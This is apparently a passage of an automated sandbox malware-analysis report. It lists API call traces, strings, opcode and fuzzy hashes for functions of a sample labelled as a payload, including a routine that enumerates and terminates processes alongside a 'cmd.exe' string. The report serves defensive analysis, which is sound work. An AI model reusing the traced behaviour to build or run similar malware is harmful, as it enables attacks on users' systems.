                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call$le
                                                                                                  • API String ID: 2464034642-2638184526
                                                                                                  • Opcode ID: 83ed9c7896b96c05b880db92f0f232de991f5ff4b8bad1705763d6521fea5a6e
                                                                                                  • Instruction ID: 65d0b44e6b2278b138de159eaa147fb2ef6702c1fe8d62be105f8e2ab5016a9b
                                                                                                  • Opcode Fuzzy Hash: 83ed9c7896b96c05b880db92f0f232de991f5ff4b8bad1705763d6521fea5a6e
                                                                                                  • Instruction Fuzzy Hash: F111B974D0020DBBCF00EFA4D586CDEBBBCEA04344B509966BE24B7645EA74E74D8B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 8363e467db88d568bb303a37057205ea1a766d2f6fcd37a73d52f68feb5a89b6
                                                                                                  • Instruction ID: 83889158d99c8c8c6b98c74f64c0445c30b8560c845cb05438b1584a76aab1d8
                                                                                                  • Opcode Fuzzy Hash: 8363e467db88d568bb303a37057205ea1a766d2f6fcd37a73d52f68feb5a89b6
                                                                                                  • Instruction Fuzzy Hash: C5C18D71700305DFDB28CF08DA899AA7BA6EF84704F245929F892EB741DB30ED55CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00E435B1
                                                                                                    • Part of subcall function 00E45208: __getptd_noexit.LIBCMT ref: 00E45208
                                                                                                  • __gmtime64_s.LIBCMT ref: 00E4364A
                                                                                                  • __gmtime64_s.LIBCMT ref: 00E43680
                                                                                                  • __gmtime64_s.LIBCMT ref: 00E4369D
                                                                                                  • __allrem.LIBCMT ref: 00E436F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E4370F
                                                                                                  • __allrem.LIBCMT ref: 00E43726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E43744
                                                                                                  • __allrem.LIBCMT ref: 00E4375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E43779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  • Opcode ID: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                  • Instruction ID: 264b00e150964ceca8fc72d38185612051bf89c9cc0932b8f2a992d0280128f3
                                                                                                  • Opcode Fuzzy Hash: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                  • Instruction Fuzzy Hash: 18712BF1A00716ABE714AE79EC46B5BB3E4AF44724F14523AF954F7681E770DA008B90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00E854C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00E854D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00E854F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00E85503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00E85531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00E8555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00E855F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  • Opcode ID: ff21cf089e3ba1900c8f41be6beb934476e69290a78887f1b7958961248ccf83
                                                                                                  • Instruction ID: d575727c9517ea9cd8860141f1ff7b25f390bb9a6eb1cdaa3c4faeba38fb15e5
                                                                                                  • Opcode Fuzzy Hash: ff21cf089e3ba1900c8f41be6beb934476e69290a78887f1b7958961248ccf83
                                                                                                  • Instruction Fuzzy Hash: 2B517032B80704BBEB207BA49C47FBF77A5EF05B10F100026FA09BB1D1DA61590597B2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00E3244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E32469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E324A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 00E324B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E324B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E324C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00E324CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  • Opcode ID: 8c5c056cd0192b0e353134265022f2d5bd8f3762377794cc26cc31265353e55f
                                                                                                  • Instruction ID: 0ad473e420755efdb1d7c5e74cf63cc3e2e37fe94d55e5344edac2e9afc30cf8
                                                                                                  • Opcode Fuzzy Hash: 8c5c056cd0192b0e353134265022f2d5bd8f3762377794cc26cc31265353e55f
                                                                                                  • Instruction Fuzzy Hash: C001B5325012197FE7206BA1BC8DFAE7B7CDB08714F100064FE08F6141E774C9458AB1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00E2F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00E2F353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  • Opcode ID: 3804d61e2697fe1c394bc7ca7a30848376a3aa2a36c0f19b5048689f1e9dcf25
                                                                                                  • Instruction ID: 5b1c5c9ee76cfd2d97831db1d647864985f7ff0b0eb3468f40e1f22347efe0ac
                                                                                                  • Opcode Fuzzy Hash: 3804d61e2697fe1c394bc7ca7a30848376a3aa2a36c0f19b5048689f1e9dcf25
                                                                                                  • Instruction Fuzzy Hash: 46C12871D01219EADF00DFA4ED89BDEBBF5BF14308F505029E405B7291EB75AA18CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  • API String ID: 909875538-2908105608
                                                                                                  • Opcode ID: 194f59651a0693bcc5be05b772679eebea2bcefdbc669ac73593df80b7143db4
                                                                                                  • Instruction ID: c5e65de50909363d1d8933da5cf151763c243c47eedee610c76f2493ff5472a3
                                                                                                  • Opcode Fuzzy Hash: 194f59651a0693bcc5be05b772679eebea2bcefdbc669ac73593df80b7143db4
                                                                                                  • Instruction Fuzzy Hash: BD4137A5BC834229FB217639BC03F9663C15B50F55F086861F79CF91C3F68585469392
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00E45141
                                                                                                    • Part of subcall function 00E47D6C: EncodePointer.KERNEL32(00000000,?,00E45146,00E43FFE,00F27990,00000014), ref: 00E47D6F
                                                                                                    • Part of subcall function 00E47D6C: __initp_misc_winsig.LIBCMT ref: 00E47D8A
                                                                                                    • Part of subcall function 00E47D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E526B3
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E526C7
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E526DA
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E526ED
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E52700
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E52713
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E52726
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E52739
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E5274C
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E5275F
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E52772
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E52785
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E52798
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E527AB
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E527BE
                                                                                                    • Part of subcall function 00E47D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E527D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00E45146
                                                                                                  • __mtterm.LIBCMT ref: 00E4514F
                                                                                                    • Part of subcall function 00E451B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E45154,00E43FFE,00F27990,00000014), ref: 00E48B62
                                                                                                    • Part of subcall function 00E451B7: _free.LIBCMT ref: 00E48B69
                                                                                                    • Part of subcall function 00E451B7: DeleteCriticalSection.KERNEL32(00F2AC00,?,?,00E45154,00E43FFE,00F27990,00000014), ref: 00E48B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00E45174
                                                                                                  • __initptd.LIBCMT ref: 00E45196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E4519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3567560977-0
                                                                                                  • Opcode ID: 8118070667d35934ad04215c8a37e90796c1c5ebb321f0bbf75cafab82f81147
                                                                                                  • Instruction ID: c72a1783e09dab2deee0d6dd2ebf8a44bec92b5cdd5e82eb370cc7143f487150
                                                                                                  • Opcode Fuzzy Hash: 8118070667d35934ad04215c8a37e90796c1c5ebb321f0bbf75cafab82f81147
                                                                                                  • Instruction Fuzzy Hash: CBF0FA3364AF111FE63837B87C03B8A26C0AF02735B202A1AF564F92D2FF2088024192
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __lock.LIBCMT ref: 00E4594A
                                                                                                    • Part of subcall function 00E48AF7: __mtinitlocknum.LIBCMT ref: 00E48B09
                                                                                                    • Part of subcall function 00E48AF7: __amsg_exit.LIBCMT ref: 00E48B15
                                                                                                    • Part of subcall function 00E48AF7: EnterCriticalSection.KERNEL32(?,?,00E450D7,0000000D), ref: 00E48B22
                                                                                                  • _free.LIBCMT ref: 00E45970
                                                                                                    • Part of subcall function 00E40BED: HeapFree.KERNEL32(00000000,00000000,?,00E4507F,00000000,00E4500D,?,00E43F7C,?,00E3E6CC,00000000), ref: 00E40C01
                                                                                                    • Part of subcall function 00E40BED: GetLastError.KERNEL32(00000000,?,00E4507F,00000000,00E4500D,?,00E43F7C,?,00E3E6CC,00000000,?,?,?,?,?,00EEB3EC), ref: 00E40C13
                                                                                                  • __lock.LIBCMT ref: 00E45989
                                                                                                  • ___removelocaleref.LIBCMT ref: 00E45998
                                                                                                  • ___freetlocinfo.LIBCMT ref: 00E459B1
                                                                                                  • _free.LIBCMT ref: 00E459C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                  • String ID:
                                                                                                  • API String ID: 626533743-0
                                                                                                  • Opcode ID: 477c2f19acde4972e4af5618be77c67179b78f4e9de3dc9e33ff3c736fdcd304
                                                                                                  • Instruction ID: cb29e6c0fdb782c5b8e1709514db861d2c8c36269713f2fa4aaf2d340ecc4d85
                                                                                                  • Opcode Fuzzy Hash: 477c2f19acde4972e4af5618be77c67179b78f4e9de3dc9e33ff3c736fdcd304
                                                                                                  • Instruction Fuzzy Hash: A9015B32502B00D7DA35AF68B546B1D73E0AF90735F20625EE274760E6CFB88980DA55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$Ul
                                                                                                  • API String ID: 1302938615-2110468602
                                                                                                  • Opcode ID: 5ee3257637e65217b8303e7a06dbfa21eed47bc30edaa4485fd7ccfba64a5548
                                                                                                  • Instruction ID: 29955fc62123d51af49ef9b310460c62d974438a0f80af989abe42ab88f14bff
                                                                                                  • Opcode Fuzzy Hash: 5ee3257637e65217b8303e7a06dbfa21eed47bc30edaa4485fd7ccfba64a5548
                                                                                                  • Instruction Fuzzy Hash: 48817DB1A087519FD710CF289840A2BBBE5BFC8758F15591DF9D9A7212E330DD058B92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 00E707C3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                  • API String ID: 601868998-2416195885
                                                                                                  • Opcode ID: 78054a7139c5655faf0533b395915ececd56e5a02430f1f29d5e61477a50e1f6
                                                                                                  • Instruction ID: cbb59d654d75a0eb92035a0afef4f97ef1d688519106a4261c27326e8b158715
                                                                                                  • Opcode Fuzzy Hash: 78054a7139c5655faf0533b395915ececd56e5a02430f1f29d5e61477a50e1f6
                                                                                                  • Instruction Fuzzy Hash: 6541E771A043059BD728EE24DC45BAFB3D8EF81749F00582EF589F3141E675E9088BA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 00E61726
                                                                                                  • _strlen.LIBCMT ref: 00E61734
                                                                                                    • Part of subcall function 00E45208: __getptd_noexit.LIBCMT ref: 00E45208
                                                                                                  • _strnlen.LIBCMT ref: 00E617BF
